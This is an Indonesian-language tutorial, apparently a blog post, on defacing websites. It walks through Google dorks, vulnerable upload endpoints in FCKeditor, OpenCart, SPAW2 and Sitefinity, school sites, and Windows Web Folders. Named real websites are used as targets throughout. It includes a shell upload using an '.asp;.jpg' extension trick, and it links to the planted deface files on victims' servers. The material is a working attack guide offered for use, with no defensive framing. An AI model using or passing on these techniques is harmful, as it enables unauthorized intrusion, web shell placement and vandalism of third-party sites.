Defacing

1. Defacing ASPX

Langsung buka google, masukkan dork inurl:Fck/fcklinkgallery.aspx atau /portals/0/inurl:tabid/176/Default.aspx. Lalu saya ambil salah satu contoh web yg vuln http://www.primeplasticsinc.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx dan akan tampil halaman seperti ini. Link type nya kita ubah ke file (a file in your site).

Lalu ubah URL nya menjadi javascript:__doPostBack(‘ctlURL$cmdUpload’,” ). Maka tampil command choose file, lalu masukkan file anda dan upload.

Note: ekstensi file yang dapat di upload yaitu ( *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip )

Untuk melihat hasilnya maka tambahkan public_html/portals/0/file_kamu. Maka akan seperti ini http://www.primeplasticsinc.net/portals/0/adhie70.txt mudah bukan

2. Defacing OpenCart

Buka google, masukkan dork Powered By OpenCart site:.com atau SUPPORT BY OPENCART

Saya mendapatkan target www.centaurguitar.com/storefront2/ lalu kita masukkan exploitnya admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html. Jadi alamatnya akan seperti ini www.centaurguitar.com/storefront2/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html dan akan muncul halaman website seperti ini

Ok langsung saja upload file kita, jika berhasil maka akan muncul message box “File uploaded with no errors” dan hasilnya seperti ini http://www.centaurguitar.com/adhie70.html

3. Defacing SPAW

Buka google, masukkan dork nya inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/

Contoh targetnya seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php lalu perhatikan gambar ini

URL yang saya blog hapus dan diganti spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

Maka akan alamat URL nya akan seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da75%202d9%208cac9 dan muncul pilihan upload, tinggal upload saja file nya. Dan hasilnya seperti ini http://www.demariahoeve.nl/cms/spaw2/uploads/files/adhie70.txt

4. Defacing Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Dork : “Sitefinity: Login”

Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

Cari targetnya sama seperti cara diatas. Contoh targetnya http://www.hoac-bsa.org/sitefinity/ lalu masukkan exploitnya sehingga seperti ini http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx lalu sekarang kita tinggal upload sheelnya, dalam ASP.NET file yang dapat diupload adalah JPG, contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif). Jika sudah diupload, maka cara untuk menampilkan shell kita dengan mengklik “view original size” dan hasilnya seperti ini http://www.hoac-bsa.org/Images/adhie70.asp;.jpg

5.Defacing .txt / Sch.id

Sebenarnya banyak banget cara deface web. Tapi untuk belajaran coba tutorial ini..

masukkan salah satu dork ini ke mbah google :
pilih salah satu dan paste di google .
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

kalau targetnya sudah ketemu, masukkan salah satu exploit ini :
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html
*yang berwarna merah , ganti dengan web target ente

example : http://www.smun1-krw.sch.id/editor/filemanager/connectors/uploadtest.html

kemudian pilih connector nya. Dari ASP ganti PHP .
dan tinggal upload file .TXT ente..

jika muncul sepeti ini :

berarti selamat ente sudah berhasil upload file .txk ente..

dan sekarang tinggal liat hasil deface kita. caranya :
buka http://www.smun1-krw.sch.id/userfiles/The_MiLd.txt
*ganti tulisan yang berwarna hijau dengan nama file .TXT ente yang tadi di upload..

6. Defacing Web Folder

1. Buka My Computer lalu lihat icon web folder, lalu klik 2x icon web folder tersebut (Win 98/ME/2000).
Jika kamu menggunakan windows XP secara default tidak akan menemukan folder tersebut di My Computer, tapi kamu bisa membuat secara manual dengan membuat shortcut baru.
Berikut langkahnya :
- Klik kanan pada desktop, kemudian pilih New -> Shortcut .
- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan, lalu kamu masukkan alamat dibawah ini
%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
- Jika sudah silakan klik Next -> Next -> Finish.
- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut.
2. Jika kamu sudah berhasil membuka web folder tersebut kemudian klik kanan lalu pilih New - Web Folder
3. Lalu akan muncul popup yang meminta untuk memasukkan alamat tujuan. Sebagai contoh kamu masukkan www.hljdk.gov.cn sebagai target.
4. Kemudian klik Next dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.
5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain, jika domainnya adalah www.hljdk.gov.cn, maka nama foldernya juga www.hljdk.gov.cn .
6. Copy paste sebuah file html ke dalam web folder yang telah kamu buat (www.hljdk.gov.cn).
7. Jika proses copy paste selesai, sebagai contoh jika nama file kamu adalah "deface.html" maka cara melihatnya adalah dengan membuka browser dan mengetikkan alamat http://www.hljdk.gov.cn/deface.html .
8. Aksi deface selesai.